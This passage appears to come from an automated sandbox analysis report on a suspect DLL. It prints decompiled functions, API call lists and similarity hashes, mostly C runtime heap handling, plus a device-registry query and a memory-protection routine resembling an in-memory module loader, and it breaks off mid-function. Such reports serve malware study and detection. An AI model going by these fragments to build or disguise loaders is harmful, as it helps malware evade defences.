                                                                                                                                                                  APIs
                                                                                                                                                                  • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001AC12
                                                                                                                                                                  • SetLastError.KERNEL32(0000007E), ref: 1001AC54
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4100373531-0
                                                                                                                                                                  • Opcode ID: ef285a2fe75f96ee2784fecbbb44db874fd234a3fa6e90b292717812d422f0a0
                                                                                                                                                                  • Instruction ID: 7fa1d4eba7a4407511cddb994e7de49554f5151831751da13495a7fdaa87bcf2
                                                                                                                                                                  • Opcode Fuzzy Hash: ef285a2fe75f96ee2784fecbbb44db874fd234a3fa6e90b292717812d422f0a0
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B81A374A00209EFDB04CF94D981AAEB7F1FF89355F248158E919AB351C735EA82CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 23%
                                                                                                                                                                  			E1000C9F5(signed char __eax, void* __ebx, void* __ecx, signed char __edx, void* __edi) {
                                                                                                                                                                  				signed char _t12;
                                                                                                                                                                  				intOrPtr* _t20;
                                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                                  				signed char _t37;
                                                                                                                                                                  				intOrPtr _t40;
                                                                                                                                                                  				signed int _t42;
                                                                                                                                                                  
                                                                                                                                                                  				_t36 = __edx;
                                                                                                                                                                  				_t11 = __eax;
                                                                                                                                                                  				do {
                                                                                                                                                                  					 *_t11 =  *_t11 + _t36;
                                                                                                                                                                  					asm("rol dh, 1");
                                                                                                                                                                  					 *_t11 =  *_t11 + _t36;
                                                                                                                                                                  					_t12 = _t11 ^ 0x000000ba;
                                                                                                                                                                  					 *_t12 =  *_t12 + _t36;
                                                                                                                                                                  					asm("adc al, 0xbe");
                                                                                                                                                                  					 *_t12 =  *_t12 + _t36;
                                                                                                                                                                  					_t37 = _t36 & _t12;
                                                                                                                                                                  					 *_t12 =  *_t12 + _t37;
                                                                                                                                                                  					 *_t12 = 0x10;
                                                                                                                                                                  					asm("movsd");
                                                                                                                                                                  					 *_t12 =  *_t12 + _t37;
                                                                                                                                                                  					asm("rol dword [eax], 0x10");
                                                                                                                                                                  					_t36 = 0xc5;
                                                                                                                                                                  					 *0xbd851000 =  *0xbd851000 + 0xc5;
                                                                                                                                                                  					_push(ss);
                                                                                                                                                                  					 *0xbd851000 =  *0xbd851000 + 0xc5;
                                                                                                                                                                  					 *0xFFFFFFFF7A7B2000 =  *((intOrPtr*)(0xffffffff7a7b2000)) + 0xc5;
                                                                                                                                                                  					 *(0xffffffff7a7b2000 & _t42) =  *(0xffffffff7a7b2000 & _t42) + 0xc5;
                                                                                                                                                                  					_t11 = 0xbc671000;
                                                                                                                                                                  					 *0xbc671000 =  *0xbc671000 + 0xc5;
                                                                                                                                                                  				} while ( *0xbc671000 >= 0);
                                                                                                                                                                  				 *0xbc671000 =  *0xbc671000 + 0xc5;
                                                                                                                                                                  				asm("les eax, [eax]");
                                                                                                                                                                  				asm("adc [edx+0xc], ch");
                                                                                                                                                                  				_push(0xc);
                                                                                                                                                                  				_push(0x103314d0);
                                                                                                                                                                  				_t18 = E10010594(0xbc671000, __edi, 0xc2af1000);
                                                                                                                                                                  				_t40 =  *((intOrPtr*)(_t42 + 8));
                                                                                                                                                                  				if(_t40 != 0) {
                                                                                                                                                                  					if( *0x10337f3c != 3) {
                                                                                                                                                                  						_push(_t40);
                                                                                                                                                                  						goto L10;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						L1000FA63(4);
                                                                                                                                                                  						 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
                                                                                                                                                                  						_t23 = E1000FADC(_t40);
                                                                                                                                                                  						 *((intOrPtr*)(_t42 - 0x1c)) = _t23;
                                                                                                                                                                  						if(_t23 != 0) {
                                                                                                                                                                  							_push(_t40);
                                                                                                                                                                  							_push(_t23);
                                                                                                                                                                  							E1000FB07();
                                                                                                                                                                  						}
                                                                                                                                                                  						 *(_t42 - 4) = 0xfffffffe;
                                                                                                                                                                  						_t18 = E1000CA96();
                                                                                                                                                                  						if( *((intOrPtr*)(_t42 - 0x1c)) == 0) {
                                                                                                                                                                  							_push( *((intOrPtr*)(_t42 + 8)));
                                                                                                                                                                  							L10:
                                                                                                                                                                  							_push(0);
                                                                                                                                                                  							_t18 = RtlFreeHeap( *0x10335310); // executed
                                                                                                                                                                  							_t48 = _t18;
                                                                                                                                                                  							if(_t18 == 0) {
                                                                                                                                                                  								_t20 = E1000F780(_t48);
                                                                                                                                                                  								 *_t20 = E1000F745(GetLastError());
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return E100105D9(_t18);
                                                                                                                                                                  			}










                                                                                                                                                                  APIs
                                                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2661975262-0
                                                                                                                                                                  • Opcode ID: 91d68bd76e7703e056fce8e9dd49243a3d61e3c5222d378c7e6cca3091671d2d
                                                                                                                                                                  • Instruction ID: 7764d91bb7ab2f2a00e23681c00b78d4a37f2ec3e5ecfdf2bc9b2b987e4ed42f
                                                                                                                                                                  • Opcode Fuzzy Hash: 91d68bd76e7703e056fce8e9dd49243a3d61e3c5222d378c7e6cca3091671d2d
                                                                                                                                                                  • Instruction Fuzzy Hash: FA21F17AA0D3895FEB03CB704C85A893F60DF072D5F0A00DAE0449B1E7DA748C09CB52
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                                  			E100197E0(void* __ebx, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a36, intOrPtr* _a40, intOrPtr* _a44) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				void* _t45;
                                                                                                                                                                  
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12, 0, 0, _a44); // executed
                                                                                                                                                                  				if(GetLastError() == 0x7a) {
                                                                                                                                                                  					 *_a40 = L1000CEAF(__ebx, _a44, _t45, __esi,  *_a44);
                                                                                                                                                                  					E1000CF80(_t45,  *_a40, 0,  *_a44);
                                                                                                                                                                  					__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12,  *_a40,  *_a44, 0); // executed
                                                                                                                                                                  					_v8 = 1;
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v8;
                                                                                                                                                                  			}







                                                                                                                                                                  APIs
                                                                                                                                                                  • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 1001980C
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 10019812
                                                                                                                                                                  • _memset.LIBCMT ref: 1001983E
                                                                                                                                                                  • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019864
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DevicePropertyRegistrySetup$ErrorLast_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 895502402-0
                                                                                                                                                                  • Opcode ID: 2d95c2e300a34be0fbb8f74636acd25f512a94cea09224e1131316ccc75926d7
                                                                                                                                                                  • Instruction ID: 24f19bb5529a22c6d1e928f7077b1b8c164a3afe4c2a2c0ecea0b5371702a92b
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d95c2e300a34be0fbb8f74636acd25f512a94cea09224e1131316ccc75926d7
                                                                                                                                                                  • Instruction Fuzzy Hash: EA11C6B9610208ABDB04CF94C8D5FDA77B9AB48304F118259F9099B280DA31EA85CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 27%
                                                                                                                                                                  			E1000CA40(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                  				intOrPtr* _t10;
                                                                                                                                                                  				intOrPtr _t13;
                                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                                  				void* _t25;
                                                                                                                                                                  
                                                                                                                                                                  				_push(0xc);
                                                                                                                                                                  				_push(0x103314d0);
                                                                                                                                                                  				_t8 = E10010594(__ebx, __edi, __esi);
                                                                                                                                                                  				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                                                                  				if(_t23 == 0) {
                                                                                                                                                                  					L9:
                                                                                                                                                                  					return E100105D9(_t8);
                                                                                                                                                                  				}
                                                                                                                                                                  				if( *0x10337f3c != 3) {
                                                                                                                                                                  					_push(_t23);
                                                                                                                                                                  					L7:
                                                                                                                                                                  					_push(0);
                                                                                                                                                                  					_t8 = RtlFreeHeap( *0x10335310); // executed
                                                                                                                                                                  					_t31 = _t8;
                                                                                                                                                                  					if(_t8 == 0) {
                                                                                                                                                                  						_t10 = E1000F780(_t31);
                                                                                                                                                                  						 *_t10 = E1000F745(GetLastError());
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L9;
                                                                                                                                                                  				}
                                                                                                                                                                  				L1000FA63(4);
                                                                                                                                                                  				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                                                                  				_t13 = E1000FADC(_t23);
                                                                                                                                                                  				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                                                                                  				if(_t13 != 0) {
                                                                                                                                                                  					_push(_t23);
                                                                                                                                                                  					_push(_t13);
                                                                                                                                                                  					E1000FB07();
                                                                                                                                                                  				}
                                                                                                                                                                  				 *(_t25 - 4) = 0xfffffffe;
                                                                                                                                                                  				_t8 = E1000CA96();
                                                                                                                                                                  				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                                                                                  					goto L9;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                                                                                  					goto L7;
                                                                                                                                                                  				}
                                                                                                                                                                  			}








                                                                                                                                                                  APIs
                                                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2661975262-0
                                                                                                                                                                  • Opcode ID: d780af77af3ab278b6395a02338741367fa495b444a8d1c9c9272429d9e468c3
                                                                                                                                                                  • Instruction ID: 3e12d920bd94fb88c3074afbf6a3b3a9ea402cf26d7ac91cde5cb1516b55b14c
                                                                                                                                                                  • Opcode Fuzzy Hash: d780af77af3ab278b6395a02338741367fa495b444a8d1c9c9272429d9e468c3
                                                                                                                                                                  • Instruction Fuzzy Hash: 44016735A0531AAAFB10DBB18C86F5E3AA4EF023E9F210109F508AA0D5DF34A940DF56
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                  			E1000CEBD(void* __edx) {
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				intOrPtr _t1;
                                                                                                                                                                  				void* _t2;
                                                                                                                                                                  				void* _t6;
                                                                                                                                                                  				void* _t10;
                                                                                                                                                                  				void* _t12;
                                                                                                                                                                  				void* _t18;
                                                                                                                                                                  				void* _t20;
                                                                                                                                                                  				void* _t22;
                                                                                                                                                                  				intOrPtr _t24;
                                                                                                                                                                  				void* _t28;
                                                                                                                                                                  				void* _t30;
                                                                                                                                                                  				void* _t32;
                                                                                                                                                                  
                                                                                                                                                                  				_t18 = __edx;
                                                                                                                                                                  				_t12 = HeapAlloc;
                                                                                                                                                                  				do {
                                                                                                                                                                  					_t32 =  *0x10335310; // 0xaa0000
                                                                                                                                                                  					_t20 = _t30;
                                                                                                                                                                  					if(_t32 == 0) {
                                                                                                                                                                  						E10011F42(_t12, _t18, _t20, _t32);
                                                                                                                                                                  						E10011DA2(0x1e);
                                                                                                                                                                  						E10011B04(0xff);
                                                                                                                                                                  					}
                                                                                                                                                                  					_t1 =  *0x10337f3c; // 0x1
                                                                                                                                                                  					if(_t1 != 1) {
                                                                                                                                                                  						__eflags = _t1 - 3;
                                                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                                                  							L10:
                                                                                                                                                                  							__eflags = _t30;
                                                                                                                                                                  							if(_t30 == 0) {
                                                                                                                                                                  								_t20 = 1;
                                                                                                                                                                  								__eflags = 1;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t22 = _t20 + 0x0000000f & 0xfffffff0;
                                                                                                                                                                  							__eflags = _t22;
                                                                                                                                                                  							_push(_t22);
                                                                                                                                                                  							goto L13;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_push(_t30);
                                                                                                                                                                  							_t2 = E1000CE60(_t12, _t20, 0, __eflags);
                                                                                                                                                                  							__eflags = _t2;
                                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                                  								goto L10;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						if(_t30 == 0) {
                                                                                                                                                                  							_t10 = 1;
                                                                                                                                                                  							__eflags = 1;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t10 = _t30;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push(_t10);
                                                                                                                                                                  						L13:
                                                                                                                                                                  						_push(0);
                                                                                                                                                                  						_t2 = RtlAllocateHeap( *0x10335310); // executed
                                                                                                                                                                  					}
                                                                                                                                                                  					_t28 = _t2;
                                                                                                                                                                  					if(_t28 == 0) {
                                                                                                                                                                  						_t24 = 0xc;
                                                                                                                                                                  						if( *0x103357e4 == _t2) {
                                                                                                                                                                  							 *((intOrPtr*)(E1000F780(__eflags))) = _t24;
                                                                                                                                                                  							L19:
                                                                                                                                                                  							 *((intOrPtr*)(E1000F780(_t37))) = _t24;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							goto L16;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					return _t28;
                                                                                                                                                                  					L16:
                                                                                                                                                                  					_t6 = E1001092A(_t30);
                                                                                                                                                                  					_t37 = _t6;
                                                                                                                                                                  				} while (_t6 != 0);
                                                                                                                                                                  				goto L19;
                                                                                                                                                                  			}



















                                                                                                                                                                  APIs
                                                                                                                                                                  • __FF_MSGBANNER.LIBCMT ref: 1000CED2
                                                                                                                                                                    • Part of subcall function 10011F42: __NMSG_WRITE.LIBCMT ref: 10011F69
                                                                                                                                                                    • Part of subcall function 10011F42: __NMSG_WRITE.LIBCMT ref: 10011F73
                                                                                                                                                                  • __NMSG_WRITE.LIBCMT ref: 1000CED9
                                                                                                                                                                    • Part of subcall function 10011DA2: _strcpy_s.LIBCMT ref: 10011E0E
                                                                                                                                                                    • Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011E1F
                                                                                                                                                                    • Part of subcall function 10011DA2: GetModuleFileNameA.KERNEL32(00000000,103354E9,00000104,?,103352E0,00000000), ref: 10011E3B
                                                                                                                                                                    • Part of subcall function 10011DA2: _strcpy_s.LIBCMT ref: 10011E50
                                                                                                                                                                    • Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011E63
                                                                                                                                                                    • Part of subcall function 10011DA2: _strlen.LIBCMT ref: 10011E6C
                                                                                                                                                                    • Part of subcall function 10011DA2: _strlen.LIBCMT ref: 10011E79
                                                                                                                                                                    • Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011EA6
                                                                                                                                                                    • Part of subcall function 10011B04: ___crtCorExitProcess.LIBCMT ref: 10011B08
                                                                                                                                                                    • Part of subcall function 10011B04: ExitProcess.KERNEL32 ref: 10011B12
                                                                                                                                                                    • Part of subcall function 1000CE60: ___sbh_alloc_block.LIBCMT ref: 1000CE88
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 1000CF27
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$AllocateFileHeapModuleName___crt___sbh_alloc_block
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3791426274-0
                                                                                                                                                                  • Opcode ID: cde093680f6c0b126d7258c0ccc5fda5382228ab6452671c1bcb805c8c46bad4
                                                                                                                                                                  • Instruction ID: e2b4030b7ffdff5dfd6972142c91b8fd57cf3792c5bc4284219116a52f4c6e3d
                                                                                                                                                                  • Opcode Fuzzy Hash: cde093680f6c0b126d7258c0ccc5fda5382228ab6452671c1bcb805c8c46bad4
                                                                                                                                                                  • Instruction Fuzzy Hash: 17012B3664936F5AF221D3699C81D7A72DDDB847F0B220036F908CA19ACA60DC419192
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                  			E1001B220(intOrPtr* _a4, void** _a8) {
                                                                                                                                                                  				long _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                  				signed int _v24;
                                                                                                                                                                  				int _t67;
                                                                                                                                                                  
                                                                                                                                                                  				if(_a8[2] != 0) {
                                                                                                                                                                  					_t4 =  &(_a8[3]); // 0x1
                                                                                                                                                                  					if(( *_t4 & 0x02000000) == 0) {
                                                                                                                                                                  						_t31 =  &(_a8[3]); // 0x1
                                                                                                                                                                  						asm("sbb edx, edx");
                                                                                                                                                                  						_v16 =  ~( ~( *_t31 & 0x20000000));
                                                                                                                                                                  						_t34 =  &(_a8[3]); // 0x1
                                                                                                                                                                  						asm("sbb ecx, ecx");
                                                                                                                                                                  						_v24 =  ~( ~( *_t34 & 0x40000000));
                                                                                                                                                                  						_t37 =  &(_a8[3]); // 0x1
                                                                                                                                                                  						asm("sbb eax, eax");
                                                                                                                                                                  						_v12 =  ~( ~( *_t37 & 0x80000000));
                                                                                                                                                                  						_t42 = _v24 * 8; // 0x2035072d
                                                                                                                                                                  						_v20 =  *((intOrPtr*)((_v16 << 4) + _t42 + 0x103350c4 + _v12 * 4));
                                                                                                                                                                  						_t49 =  &(_a8[3]); // 0x1
                                                                                                                                                                  						if(( *_t49 & 0x04000000) != 0) {
                                                                                                                                                                  							_v20 = _v20 | 0x00000200;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t55 =  &(_a8[2]); // 0xb805ebc0
                                                                                                                                                                  						_t67 = VirtualProtect( *_a8,  *_t55, _v20,  &_v8); // executed
                                                                                                                                                                  						if(_t67 != 0) {
                                                                                                                                                                  							return 1;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_push("Error protecting memory page");
                                                                                                                                                                  							E1001AEC0(_t67);
                                                                                                                                                                  							return 0;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					_t7 =  &(_a8[1]); // 0x330475c0
                                                                                                                                                                  					if( *_a8 !=  *_t7) {
                                                                                                                                                                  						L8:
                                                                                                                                                                  						return 1;
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x3c)) {
                                                                                                                                                                  						L7:
                                                                                                                                                                  						_t26 =  &(_a8[2]); // 0xb805ebc0
                                                                                                                                                                  						 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))( *_a8,  *_t26, 0x4000,  *((intOrPtr*)(_a4 + 0x34))); // executed
                                                                                                                                                                  						goto L8;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t16 =  &(_a8[2]); // 0xb805ebc0
                                                                                                                                                                  						if( *_t16 %  *(_a4 + 0x3c) != 0) {
                                                                                                                                                                  							goto L8;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L7;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return 1;
                                                                                                                                                                  			}










                                                                                                                                                                  Strings
                                                                                                                                                                  • Error protecting memory page, xrefs: 1001B33D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Error protecting memory page
                                                                                                                                                                  • API String ID: 0-1748499907
                                                                                                                                                                  • Opcode ID: 2fdaa3f8ac2132a0ab7f5db0e2b56953538e95dc798f7bf7b4009c1be8786609
                                                                                                                                                                  • Instruction ID: 5374f92ac9c7a156fd4897085e59d133f9b4e73f21f8500888812b2ad4014a11
                                                                                                                                                                  • Opcode Fuzzy Hash: 2fdaa3f8ac2132a0ab7f5db0e2b56953538e95dc798f7bf7b4009c1be8786609
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E41B774A0450A9FDB08CF58C490B99B3B6FB88354F24C259EC1A9F355D771EE91CB80
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1000F81F(intOrPtr _a4) {
                                                                                                                                                                  				void* _t6;
                                                                                                                                                                  				intOrPtr _t7;
                                                                                                                                                                  				void* _t10;
                                                                                                                                                                  
                                                                                                                                                                  				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                                  				 *0x10335310 = _t6;
                                                                                                                                                                  				if(_t6 != 0) {
                                                                                                                                                                  					_t7 = E1000F7C4(__eflags);
                                                                                                                                                                  					__eflags = _t7 - 3;
                                                                                                                                                                  					 *0x10337f3c = _t7;
                                                                                                                                                                  					if(_t7 != 3) {
                                                                                                                                                                  						L5:
                                                                                                                                                                  						__eflags = 1;
                                                                                                                                                                  						return 1;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t10 = E1000FA94(0x3f8);
                                                                                                                                                                  						__eflags = _t10;
                                                                                                                                                                  						if(_t10 != 0) {
                                                                                                                                                                  							goto L5;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							HeapDestroy( *0x10335310);
                                                                                                                                                                  							 *0x10335310 =  *0x10335310 & 0x00000000;
                                                                                                                                                                  							goto L1;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					L1:
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  			}







                                                                                                                                                                  APIs
                                                                                                                                                                  • HeapCreate.KERNEL32(00000000,00001000,00000000,1000EA0F,00000001), ref: 1000F830
                                                                                                                                                                  • HeapDestroy.KERNEL32 ref: 1000F866
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$CreateDestroy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3296620671-0
                                                                                                                                                                  • Opcode ID: 93a6f002e55d1f2c72530dbf700ee14f565e4e658e751c809a659bb994ece646
                                                                                                                                                                  • Instruction ID: 18601b020fc9775d6ac859e2e5d9de66436f62596d67e2443513b26528c1d1d3
                                                                                                                                                                  • Opcode Fuzzy Hash: 93a6f002e55d1f2c72530dbf700ee14f565e4e658e751c809a659bb994ece646
                                                                                                                                                                  • Instruction Fuzzy Hash: 0DE06574628312ABF700EB314C897A535D8E7807D2F21483DF404C84E5FFA0C640A741
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                  			E1001A9C0(void* _a4) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				void* _t49;
                                                                                                                                                                  				void* _t52;
                                                                                                                                                                  				intOrPtr _t60;
                                                                                                                                                                  				void* _t68;
                                                                                                                                                                  				void* _t70;
                                                                                                                                                                  				signed int _t76;
                                                                                                                                                                  				signed int _t87;
                                                                                                                                                                  				signed int _t93;
                                                                                                                                                                  				void* _t94;
                                                                                                                                                                  				void* _t95;
                                                                                                                                                                  				void* _t96;
                                                                                                                                                                  				void* _t97;
                                                                                                                                                                  
                                                                                                                                                                  				_t49 = _a4;
                                                                                                                                                                  				_v8 = _t49;
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					__eflags =  *(_v8 + 0x10);
